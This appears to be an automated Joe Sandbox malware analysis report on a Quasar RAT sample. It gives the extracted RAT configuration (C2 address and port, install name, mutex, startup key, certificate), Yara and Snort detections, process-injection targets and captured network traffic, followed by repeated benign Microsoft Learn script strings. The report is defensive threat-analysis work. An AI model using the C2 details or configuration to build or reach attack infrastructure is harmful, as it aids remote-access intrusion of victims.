ET TROJAN Generic AsyncRAT Style SSL Cert - Source IP: 185.196.10.233 - Destination IP: 192.168.2.5

Timestamp:	04/23/24-23:02:38.369455
SID:	2035595
Source Port:	4782
Destination Port:	49803
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack

Malware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "185.196.10.233:4782;", "SubDirectory": "gfgfgf", "InstallName": "gfdgfdg.exe", "MutexName": "b0fcdfbd-bdd4-4a5d-8ab1-7217539d4db6", "StartupKey": "fgfdhdgg", "Tag": "Office04", "LogDirectoryName": "Logs", "ServerSignature": "sLgsAfL2UUP6AlkFtdbXqluoDW3wMwZMc5jX/AEQ95yeOqJ/mDe6i6lW/m64mbhn2G3vN2d4I8Qtdsrk2BNrFgrax6KY4LwvCADg4iWu0OQObYe1kIVp1F920nP6DUrentMm6n8M1g8s0yh5HdxXXephIuo4I5YYucMt7gcLshmgAYmxg6+d/d0YKS2VeOfF2/u6r+XgU+ilIVnN+9UjjlZXvAheUXkEbG8ebP7qHAv/DAgmZBOJhfTnATX3mUUEEUqS3oJGqmX2s1j7k/+49o+l7SkZ42evs7mYtKNHm72CJqu0rqg9V2fm/gprhNvvqjOjmmKr+R9u3Fp2aS1qKKaaAUFd9QfBv7ZfmM8EaTUMi/saY/FxjvvLvxFxwqubJ96oCdONVu5DE/Q5zOby9y9ed9I3Jkp9FtwBnOQym4e0iVii1wCUXkpolBSyPGUp5GQdoCJDYndo9z2VBzLLEHDgAGBMmlglK/7uri3vB4faJObyyfsLSBNl0Ig/nKkRBiAIzPRxuLbPAo/YbPRJhWm5slo8SnnRihxPzjpbhTpHvilpqsdx1vxwo+c7vKPgi/zfrelosnaoPnp16aKmYfNzXQyJryygd3ApTPltaPEH9bBtU327kpGeGOHwaDC6JnN3RpAbgLnKYsUR9pzQmwxFsQF//cKI40pEDtA4myQ=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAMRnhbg+tJFMr/86nUEYyTANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MDMyMzAxMzgxNVoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAwbGZcqqvx4MOD4A+auAj/30nYgYK34sYaSqurPhQwOXONfWAFNMkPIlxW0gpPAfJ2VwEMcNiYAaFbOZCngmVn0Xs8buiLjvm67cg4zrMGtYkYjiofES6yH34I8VwCt1GNtgBAf+kfE4gnEzinTK/l1YX2iPSHjuUu7Ekdhr7Obgw09xCg05N3vgnu42Cyal6/uiIsjdTMsohcFHXrWTO/i+IIBNzP8Q1e7BkbOy59bM7xGIwHGjTx/eOLz76bqQXnedrCVKsWHkqaNikulKHEaOns6rUSMDf2wtiSGJ58PMU30KRR2G0G+KCeFzA5PvZSq32yrCGrTA1x9DoN6bLMWyVDYzsYlJrrYddlOcWp8IagnQYnPK+JZa+XKXKcJ9dkUgY4s7OySY82nQUtYG6jQFXAcIhOQFJUGp5/vbT35jBrBWUc0fiEUV0p+I1q07x7uUGwvuVIJsUgktViS0PSMFjSe08Xjr6rIgQM6yCnZwuh6FhbQrMxS3OB6h2Zh5lXpHUbBiTRUvWftjSp0kvFO4k08eVH7pRgRw8CJ7mj12TRUHi6zbZFjp9m98J7F6mZdbKk1SaiyZjbLvd30qQSq9VWpobo46l6sNVn1xGc25lEpvPm8dDccO/8OtvpQlqQ7sM4xKPpdnTFbgZZUibvJ2Sk1pN1zdxZLX1b1E3Ox0CAwEAAaMyMDAwHQYDVR0OBBYEFBWQtAUwfS2z8ujHYJdbIU1+U+9wMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAJre53r+uS0wgiLip0IQTosVSn3Dzmz9buiIfxIDSByi2wkWYKrIvBpg7VgjRsoEpNfayUfl+giSoqLTWpyX6IWVZrfG6dUeDD8inVEcjS+Szru/lZBx9IQph9jhoAaHnBTpIiuJ6CGELXwOa4iCjbbVLtPlBZEk2dIohOPkQBNmjp+aL/QHv5uqRJPeW4bfTt/v10JqaGKvwDURf/zRdxejlASpICX+mrTfcnJQHf2q29OeTtzI2dEKlZuraeZOQ2L9+BBdoVUHbPD4J9tkzfyPnTpkwwqJFhVBAuZWYnMGC0kqLPUcw3GRoEL7rjSVJbWZMZjox+oNwa99JO673IFf5ujY2yJTHJPk6q4i3D0j2EJfS0yu6NsW17AcsTxGXcyg+4iL3ytjitetS2GpDMdhCvm1cetZXskrnwMCHjSXp2vpbxQALftGpY9B/ALQHqneAG2qOJoXyoqIp7E3KdKgMYx3JlCUwuyHsY9qBjUu2oQwhL8LopB1kUOhzcKYWmI2BBit+h8AVTKM+7DlepxFvA/hijqUVwHMPZTZYWfJwSEk4mZW8IyYzeEOQzvCtaRIbaTMPmW9M9P7PqCMyqs/YBmejvT2YEXKyhFnpdL0AC0O3rEsia6qRH7qHLQ19AyyuDscYUc4T54dvUxmAEqErMbjwSMoMhSNVBBIVWeN"}

Yara detected Quasar RAT

Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.20599dba870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.3309899452.0000000007E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2488394877.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184893054.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3307610797.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2488394877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184893054.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3307610797.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KxgGGaiW3E.exe PID: 6612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ngen.exe PID: 4204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KxgGGaiW3E.exe PID: 7424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KxgGGaiW3E.exe PID: 2428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ilasm.exe PID: 7372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wmplayer.exe PID: 4408, type: MEMORYSTR

Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.204.213.5:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49824 version: TLS 1.2

Source: KxgGGaiW3E.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 185.196.10.233:4782 -> 192.168.2.5:49803

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.196.10.233

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.5:49803 -> 185.196.10.233:4782

Source: Joe Sandbox View	IP Address: 13.107.213.41 13.107.213.41
Source: Joe Sandbox View	IP Address: 63.140.39.35 63.140.39.35
Source: Joe Sandbox View	IP Address: 185.196.10.233 185.196.10.233
Source: Joe Sandbox View	IP Address: 185.196.10.233 185.196.10.233
Source: Joe Sandbox View	IP Address: 15.204.213.5 15.204.213.5
Source: Joe Sandbox View	IP Address: 15.204.213.5 15.204.213.5

Source: Joe Sandbox View

ASN Name: SIMPLECARRIERCH SIMPLECARRIERCH

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-3.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=y8N7c1Y4naP4LXT&MD=bDMVUy3y HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rest/v1/delivery?client=microsoftmscompoc&sessionId=fa5c231aaf8548e19d78d3d55f8a49a5&version=2.9.0 HTTP/1.1Host: target.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MSCC=NR; at_check=true; mbox=session#fa5c231aaf8548e19d78d3d55f8a49a5#1713908005\|PC#fa5c231aaf8548e19d78d3d55f8a49a5.34_0#1748086145
Source: global traffic	HTTP traffic detected: GET /rest/v1/delivery?client=microsoftmscompoc&sessionId=fa5c231aaf8548e19d78d3d55f8a49a5&version=2.9.0 HTTP/1.1Host: target.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MSCC=NR; at_check=true; MUID=0D19E9F3C251654A0877FD99C65163F5; MC1=GUID=80693ed0956b4d3bbf5854ef5432e609&HASH=8069&LV=202404&V=4&LU=1713906147888; MS0=05ae0c6c5ce74d35a7fe10439902c322; mbox=session#fa5c231aaf8548e19d78d3d55f8a49a5#1713908009\|PC#fa5c231aaf8548e19d78d3d55f8a49a5.34_0#1748086149
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=y8N7c1Y4naP4LXT&MD=bDMVUy3y HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: chromecache_136.9.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${encodeURIComponent(t)}&text=${encodeURIComponent(BC.replace("{credentialName}",e.title))}" equals www.linkedin.com (Linkedin)
Source: chromecache_136.9.dr	String found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
Source: chromecache_136.9.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
Source: chromecache_136.9.dr	String found in binary or memory: </div>`;v(t,e)}}function pR(e){T.documentElement.classList.add("api-search-has-results");for(let{container:t}of rS)t.textContent=e}function HSe(){T.documentElement.classList.remove("api-search-has-results");for(let{container:e}of rS)e.innerHTML=""}function f3e(e,t){let o=bt(),n,r;if(o==="")n=Qr[Bt].displayName,r=null;else{let a=t.packagesByMoniker[o];n=a.product.displayName,r=a.versionDisplayName}let s=T.createElement("h2");s.classList.add("api-search-results-heading","font-size-h3");let i=d`${uR.resultsHeadingTemplate.replace("{platformName}",n)}`;if(v(i,s),r!==null&&Bt==="rest"){let a=d`${H(`${Ve(o)} REST ${uR.resultsHeadingTemplate.replace("{platformName}",n)}`)}`;v(a,s)}else if(r!==null){let a=d`${H(`${uR.resultsHeadingTemplate.replace("{platformName}",n)} <span class="moniker-version">version ${Ve(r)}</span>`)}`;v(a,s)}e.appendChild(s)}function z2(e,t){if(t!==""&&!/[?&]view=/i.test(e)){let[n,r]=e.split("#");r=r===void 0?"":"#"+r,e=Bt==="rest"?`${n}${r}`:`${n}?view=${encodeURIComponent(t)}${r}`}let o=new URL(e,location.origin);return e=`${o.pathname}${o.search}${o.hash}`,Bt!=="rest"&&(e=`/${h.data.userLocale}${e}`),e}var zf="api-search-term-changed",q_="";function Gf(){return q_}function G2(e){e=e.trim(),e!==q_&&(q_=e,h.data.pageTemplate==="ApiBrowserPage"&&It({term:q_},"pushState"),window.dispatchEvent(new CustomEvent(zf,{detail:{term:q_}})))}function BSe(){let e=ee().term;return e===void 0?"":e.trim()}h.data.pageTemplate==="ApiBrowserPage"&&(q_=BSe(),window.addEventListener("popstate",()=>G2(BSe())));function zSe(){O.addEventListener(zf,V2),O.addEventListener(as,V2),h.data.pageTemplate==="ApiBrowserPage"&&V2()}var mR="";function V2(){let e=Gf(),t=bt(),o=`${e}/${t}`;return o===mR?Promise.resolve():(mR=o,h.data.pageTemplate==="ApiBrowserPage"&&t!==""&&e===""?(B2(),Promise.all([FSe(Bt,t,h.data.userLocale),Xl()]).then(([n,r])=>{if(o===mR){if(n.apiItems.length===0){pR(Tn);return}dR(r,n.apiItems,null)}},()=>{pR(wD)})):e.length<3?(HSe(),Promise.resolve()):Qr[Bt].validSearchTerm.test(e)?(B2(),Promise.all([cR(Bt,t,e,h.data.userLocale),Xl()]).then(([n,r])=>{o===mR&&(Y2(t,e,n.results.length),dR(r,n.results,n["@nextLink"]))},()=>{pR(wD)})):Xl().then(n=>dR(n,[],null)))}function Y2(e,t,o){Ue({actionType:He.OTHER,behavior:ye.SEARCH,content:{event:"api-browser-search",platform:Bt,moniker:e,term:t,results:o}})}var GSe="api-search-field";function VSe(){let e=T.createElement("form");e.classList.add(GSe,"margin-top-xxs"),e.setAttribute(Lo.name,GSe),e.action="javascript:",e.addEventListener("submit",l=>l.preventDefault());let t=T.createElement("label"),o=T.createElement("span");o.classList.add("visually-hidden"),o.textContent=xo,t.appendChild(o),e.appendChild(t);let n=T.createElement("input");n.type="search",n.classList.add("input","input-lg","padding-right-sm"),n.value=Gf(),n.placeholder=xo,t.appendChild(n);let r=T.createElement("a");r.href="#",r.title=g9,r.classList.add("clear"),r.addEventListener("click",l=>{l.preventDefault(),n.value="",n.dispatchEvent(ne
Source: chromecache_136.9.dr	String found in binary or memory: </div>`;v(t,e)}}function pR(e){T.documentElement.classList.add("api-search-has-results");for(let{container:t}of rS)t.textContent=e}function HSe(){T.documentElement.classList.remove("api-search-has-results");for(let{container:e}of rS)e.innerHTML=""}function f3e(e,t){let o=bt(),n,r;if(o==="")n=Qr[Bt].displayName,r=null;else{let a=t.packagesByMoniker[o];n=a.product.displayName,r=a.versionDisplayName}let s=T.createElement("h2");s.classList.add("api-search-results-heading","font-size-h3");let i=d`${uR.resultsHeadingTemplate.replace("{platformName}",n)}`;if(v(i,s),r!==null&&Bt==="rest"){let a=d`${H(`${Ve(o)} REST ${uR.resultsHeadingTemplate.replace("{platformName}",n)}`)}`;v(a,s)}else if(r!==null){let a=d`${H(`${uR.resultsHeadingTemplate.replace("{platformName}",n)} <span class="moniker-version">version ${Ve(r)}</span>`)}`;v(a,s)}e.appendChild(s)}function z2(e,t){if(t!==""&&!/[?&]view=/i.test(e)){let[n,r]=e.split("#");r=r===void 0?"":"#"+r,e=Bt==="rest"?`${n}${r}`:`${n}?view=${encodeURIComponent(t)}${r}`}let o=new URL(e,location.origin);return e=`${o.pathname}${o.search}${o.hash}`,Bt!=="rest"&&(e=`/${h.data.userLocale}${e}`),e}var zf="api-search-term-changed",q_="";function Gf(){return q_}function G2(e){e=e.trim(),e!==q_&&(q_=e,h.data.pageTemplate==="ApiBrowserPage"&&It({term:q_},"pushState"),window.dispatchEvent(new CustomEvent(zf,{detail:{term:q_}})))}function BSe(){let e=ee().term;return e===void 0?"":e.trim()}h.data.pageTemplate==="ApiBrowserPage"&&(q_=BSe(),window.addEventListener("popstate",()=>G2(BSe())));function zSe(){O.addEventListener(zf,V2),O.addEventListener(as,V2),h.data.pageTemplate==="ApiBrowserPage"&&V2()}var mR="";function V2(){let e=Gf(),t=bt(),o=`${e}/${t}`;return o===mR?Promise.resolve():(mR=o,h.data.pageTemplate==="ApiBrowserPage"&&t!==""&&e===""?(B2(),Promise.all([FSe(Bt,t,h.data.userLocale),Xl()]).then(([n,r])=>{if(o===mR){if(n.apiItems.length===0){pR(Tn);return}dR(r,n.apiItems,null)}},()=>{pR(wD)})):e.length<3?(HSe(),Promise.resolve()):Qr[Bt].validSearchTerm.test(e)?(B2(),Promise.all([cR(Bt,t,e,h.data.userLocale),Xl()]).then(([n,r])=>{o===mR&&(Y2(t,e,n.results.length),dR(r,n.results,n["@nextLink"]))},()=>{pR(wD)})):Xl().then(n=>dR(n,[],null)))}function Y2(e,t,o){Ue({actionType:He.OTHER,behavior:ye.SEARCH,content:{event:"api-browser-search",platform:Bt,moniker:e,term:t,results:o}})}var GSe="api-search-field";function VSe(){let e=T.createElement("form");e.classList.add(GSe,"margin-top-xxs"),e.setAttribute(Lo.name,GSe),e.action="javascript:",e.addEventListener("submit",l=>l.preventDefault());let t=T.createElement("label"),o=T.createElement("span");o.classList.add("visually-hidden"),o.textContent=xo,t.appendChild(o),e.appendChild(t);let n=T.createElement("input");n.type="search",n.classList.add("input","input-lg","padding-right-sm"),n.value=Gf(),n.placeholder=xo,t.appendChild(n);let r=T.createElement("a");r.href="#",r.title=g9,r.classList.add("clear"),r.addEventListener("click",l=>{l.preventDefault(),n.value="",n.dispatchEvent(ne
Source: chromecache_136.9.dr	String found in binary or memory: </div>`;v(t,e)}}function pR(e){T.documentElement.classList.add("api-search-has-results");for(let{container:t}of rS)t.textContent=e}function HSe(){T.documentElement.classList.remove("api-search-has-results");for(let{container:e}of rS)e.innerHTML=""}function f3e(e,t){let o=bt(),n,r;if(o==="")n=Qr[Bt].displayName,r=null;else{let a=t.packagesByMoniker[o];n=a.product.displayName,r=a.versionDisplayName}let s=T.createElement("h2");s.classList.add("api-search-results-heading","font-size-h3");let i=d`${uR.resultsHeadingTemplate.replace("{platformName}",n)}`;if(v(i,s),r!==null&&Bt==="rest"){let a=d`${H(`${Ve(o)} REST ${uR.resultsHeadingTemplate.replace("{platformName}",n)}`)}`;v(a,s)}else if(r!==null){let a=d`${H(`${uR.resultsHeadingTemplate.replace("{platformName}",n)} <span class="moniker-version">version ${Ve(r)}</span>`)}`;v(a,s)}e.appendChild(s)}function z2(e,t){if(t!==""&&!/[?&]view=/i.test(e)){let[n,r]=e.split("#");r=r===void 0?"":"#"+r,e=Bt==="rest"?`${n}${r}`:`${n}?view=${encodeURIComponent(t)}${r}`}let o=new URL(e,location.origin);return e=`${o.pathname}${o.search}${o.hash}`,Bt!=="rest"&&(e=`/${h.data.userLocale}${e}`),e}var zf="api-search-term-changed",q_="";function Gf(){return q_}function G2(e){e=e.trim(),e!==q_&&(q_=e,h.data.pageTemplate==="ApiBrowserPage"&&It({term:q_},"pushState"),window.dispatchEvent(new CustomEvent(zf,{detail:{term:q_}})))}function BSe(){let e=ee().term;return e===void 0?"":e.trim()}h.data.pageTemplate==="ApiBrowserPage"&&(q_=BSe(),window.addEventListener("popstate",()=>G2(BSe())));function zSe(){O.addEventListener(zf,V2),O.addEventListener(as,V2),h.data.pageTemplate==="ApiBrowserPage"&&V2()}var mR="";function V2(){let e=Gf(),t=bt(),o=`${e}/${t}`;return o===mR?Promise.resolve():(mR=o,h.data.pageTemplate==="ApiBrowserPage"&&t!==""&&e===""?(B2(),Promise.all([FSe(Bt,t,h.data.userLocale),Xl()]).then(([n,r])=>{if(o===mR){if(n.apiItems.length===0){pR(Tn);return}dR(r,n.apiItems,null)}},()=>{pR(wD)})):e.length<3?(HSe(),Promise.resolve()):Qr[Bt].validSearchTerm.test(e)?(B2(),Promise.all([cR(Bt,t,e,h.data.userLocale),Xl()]).then(([n,r])=>{o===mR&&(Y2(t,e,n.results.length),dR(r,n.results,n["@nextLink"]))},()=>{pR(wD)})):Xl().then(n=>dR(n,[],null)))}function Y2(e,t,o){Ue({actionType:He.OTHER,behavior:ye.SEARCH,content:{event:"api-browser-search",platform:Bt,moniker:e,term:t,results:o}})}var GSe="api-search-field";function VSe(){let 